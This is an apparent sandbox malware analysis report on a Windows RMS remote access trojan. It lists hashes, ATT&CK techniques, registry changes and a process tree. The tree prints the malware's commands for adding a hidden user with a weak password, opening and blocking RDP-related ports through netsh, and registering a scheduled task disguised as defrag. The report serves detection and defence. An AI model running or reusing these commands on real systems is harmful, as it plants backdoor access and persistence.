rms | 5312214b15330113f6eab71565e1e3c7d1ee3b59daa6703c271aaf3b192e6809

Analysis

max time kernel
148s
max time network
149s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
19-08-2024 06:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
Size

4.7MB
MD5

a9f05c13d758f4f34386042d85847bab
SHA1

d2af2b04fee943433395cd307ac6f9f405505071
SHA256

5312214b15330113f6eab71565e1e3c7d1ee3b59daa6703c271aaf3b192e6809
SHA512

1fb0a82895f95120a7648ff695af32249c38397a4444f8f32b8d3b347b6c40a2d01006a3dfb37f9f54132379150d8b3055ce38a0412a571e1d05b2467e4676b1
SSDEEP

98304:6I3IDNhT/Shhfm7D0PzBnC9W7oe2UfCqEdEwZnDbje8BziWU:6saOhFTD7oeJfnqPnDbjL2

Score

10^/10

rms defense_evasion discovery evasion lateral_movement persistence privilege_escalation rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

cmd.exenet.exenet1.exe

pid process

2408 cmd.exe
2880 net.exe
2512 net1.exe
Modifies Windows Firewall 2 TTPs 3 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid process

3896 netsh.exe
2872 netsh.exe
4180 netsh.exe

pid	process
2408	cmd.exe
2880	net.exe
2512	net1.exe

pid	process
3896	netsh.exe
2872	netsh.exe
4180	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

SETUP_73538.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\Icosahedron\\disavow.dll"	SETUP_73538.exe

Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.

Remote Desktop Protocol
T1021.001

Processes:

RDP_5166.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" RDP_5166.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0"	RDP_5166.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

abashed.exeabashed.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\International\Geo\Nation	abashed.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\International\Geo\Nation	abashed.exe

Executes dropped EXE 5 IoCs

Processes:

abashed.exeabashed.exeRDP_5166.exeabashed.exeSETUP_73538.exe

pid process

3060 abashed.exe
2704 abashed.exe
3652 RDP_5166.exe
3756 abashed.exe
3812 SETUP_73538.exe

Loads dropped DLL 64 IoCs

Processes:

a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe

pid	process
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe

Modifies WinLogon 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

RDP_5166.exeSETUP_73538.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	RDP_5166.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	RDP_5166.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0"	RDP_5166.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	SETUP_73538.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

Processes:

RDP_5166.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0"	RDP_5166.exe

Drops file in Program Files directory 5 IoCs

Processes:

a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exeSETUP_73538.exe

description	ioc	process
File created	C:\Program Files\Defragmentation\abashed.exe	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
File created	C:\Program Files\Defragmentation\ssleay32.dll	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
File created	C:\Program Files\Defragmentation\libeay32.dll	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
File created	C:\Program Files\Icosahedron\disavow.ini	SETUP_73538.exe
File created	C:\Program Files\Icosahedron\disavow.dll	SETUP_73538.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

net1.exenet1.exenet.exeabashed.execmd.exeschtasks.exenet.exeabashed.execmd.exenetsh.exeabashed.execmd.exea9f05c13d758f4f34386042d85847bab_JaffaCakes118.exeschtasks.exeRDP_5166.execmd.exenet.execmd.exenet1.exeschtasks.exeSETUP_73538.exenetsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	abashed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	abashed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	abashed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDP_5166.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SETUP_73538.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe	nsis_installer_2

Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3592 schtasks.exe

pid	process
3592	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe

pid	process
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

3948
3948
3948
3948
3948

pid	process
3948
3948
3948
3948
3948

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

abashed.exeabashed.exeSETUP_73538.exe

description	pid	process
Token: SeDebugPrivilege	3060	abashed.exe
Token: SeTakeOwnershipPrivilege	2704	abashed.exe
Token: SeTcbPrivilege	2704	abashed.exe
Token: SeTcbPrivilege	2704	abashed.exe
Token: SeDebugPrivilege	3812	SETUP_73538.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

abashed.exeabashed.exeabashed.exe

pid	process
3060	abashed.exe
3060	abashed.exe
3060	abashed.exe
3060	abashed.exe
2704	abashed.exe
2704	abashed.exe
2704	abashed.exe
2704	abashed.exe
3756	abashed.exe
3756	abashed.exe
3756	abashed.exe
3756	abashed.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a9f05c13d758f4f34386042d85847bab_JaffaCakes118.execmd.exetaskeng.exeRDP_5166.execmd.execmd.execmd.exenet.exe

description	pid	process	target process
PID 2240 wrote to memory of 3060	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	abashed.exe
PID 2240 wrote to memory of 3060	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	abashed.exe
PID 2240 wrote to memory of 3060	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	abashed.exe
PID 2240 wrote to memory of 3060	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	abashed.exe
PID 2240 wrote to memory of 3576	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	cmd.exe
PID 2240 wrote to memory of 3576	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	cmd.exe
PID 2240 wrote to memory of 3576	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	cmd.exe
PID 2240 wrote to memory of 3576	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	cmd.exe
PID 3576 wrote to memory of 3592	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3592	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3592	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3592	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3616	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3616	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3616	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3616	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3628	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3628	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3628	3576	cmd.exe	schtasks.exe
PID 3576 wrote to memory of 3628	3576	cmd.exe	schtasks.exe
PID 2240 wrote to memory of 3652	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	RDP_5166.exe
PID 2240 wrote to memory of 3652	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	RDP_5166.exe
PID 2240 wrote to memory of 3652	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	RDP_5166.exe
PID 2240 wrote to memory of 3652	2240	a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe	RDP_5166.exe
PID 3636 wrote to memory of 3756	3636	taskeng.exe	abashed.exe
PID 3636 wrote to memory of 3756	3636	taskeng.exe	abashed.exe
PID 3636 wrote to memory of 3756	3636	taskeng.exe	abashed.exe
PID 3636 wrote to memory of 3756	3636	taskeng.exe	abashed.exe
PID 3652 wrote to memory of 3812	3652	RDP_5166.exe	SETUP_73538.exe
PID 3652 wrote to memory of 3812	3652	RDP_5166.exe	SETUP_73538.exe
PID 3652 wrote to memory of 3812	3652	RDP_5166.exe	SETUP_73538.exe
PID 3652 wrote to memory of 3812	3652	RDP_5166.exe	SETUP_73538.exe
PID 3652 wrote to memory of 3812	3652	RDP_5166.exe	SETUP_73538.exe
PID 3652 wrote to memory of 3812	3652	RDP_5166.exe	SETUP_73538.exe
PID 3652 wrote to memory of 3812	3652	RDP_5166.exe	SETUP_73538.exe
PID 3652 wrote to memory of 3844	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 3844	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 3844	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 3844	3652	RDP_5166.exe	cmd.exe
PID 3844 wrote to memory of 3896	3844	cmd.exe	netsh.exe
PID 3844 wrote to memory of 3896	3844	cmd.exe	netsh.exe
PID 3844 wrote to memory of 3896	3844	cmd.exe	netsh.exe
PID 3844 wrote to memory of 3896	3844	cmd.exe	netsh.exe
PID 3652 wrote to memory of 3060	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 3060	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 3060	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 3060	3652	RDP_5166.exe	cmd.exe
PID 3060 wrote to memory of 2872	3060	cmd.exe	netsh.exe
PID 3060 wrote to memory of 2872	3060	cmd.exe	netsh.exe
PID 3060 wrote to memory of 2872	3060	cmd.exe	netsh.exe
PID 3060 wrote to memory of 2872	3060	cmd.exe	netsh.exe
PID 3652 wrote to memory of 984	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 984	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 984	3652	RDP_5166.exe	cmd.exe
PID 3652 wrote to memory of 984	3652	RDP_5166.exe	cmd.exe
PID 984 wrote to memory of 1868	984	cmd.exe	net.exe
PID 984 wrote to memory of 1868	984	cmd.exe	net.exe
PID 984 wrote to memory of 1868	984	cmd.exe	net.exe
PID 984 wrote to memory of 1868	984	cmd.exe	net.exe
PID 1868 wrote to memory of 1780	1868	net.exe	net1.exe
PID 1868 wrote to memory of 1780	1868	net.exe	net1.exe
PID 1868 wrote to memory of 1780	1868	net.exe	net1.exe
PID 1868 wrote to memory of 1780	1868	net.exe	net1.exe
PID 3652 wrote to memory of 2408	3652	RDP_5166.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2240
- C:\Program Files\Defragmentation\abashed.exe
  "C:\Program Files\Defragmentation\abashed.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3060
- - C:\Program Files\Defragmentation\abashed.exe
    "C:\Program Files\Defragmentation\abashed.exe" -second
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2704
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SchTasks /create /f /XML %temp%\Log547.xml /TN \microsoft\windows\defrag\scheduleddefrag && schtasks /Change /TN \microsoft\windows\defrag\scheduleddefrag /ENABLE && schtasks /run /TN \microsoft\windows\defrag\scheduleddefrag
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3576
- - C:\Windows\SysWOW64\schtasks.exe
    SchTasks /create /f /XML C:\Users\Admin\AppData\Local\Temp\Log547.xml /TN \microsoft\windows\defrag\scheduleddefrag
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3592
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN \microsoft\windows\defrag\scheduleddefrag /ENABLE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3616
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /TN \microsoft\windows\defrag\scheduleddefrag
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3628
- C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe
  "C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe"
  2⤵
  - Allows Network login with blank passwords
  - Executes dropped EXE
  - Modifies WinLogon
  - Hide Artifacts: Hidden Users
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3652
- - C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe
    "C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe" -i
    3⤵
    - Server Software Component: Terminal Services DLL
    - Executes dropped EXE
    - Modifies WinLogon
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3812
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4180
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3844
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3896
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3060
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:984
  - - C:\Windows\SysWOW64\net.exe
      net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1868
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
        5⤵
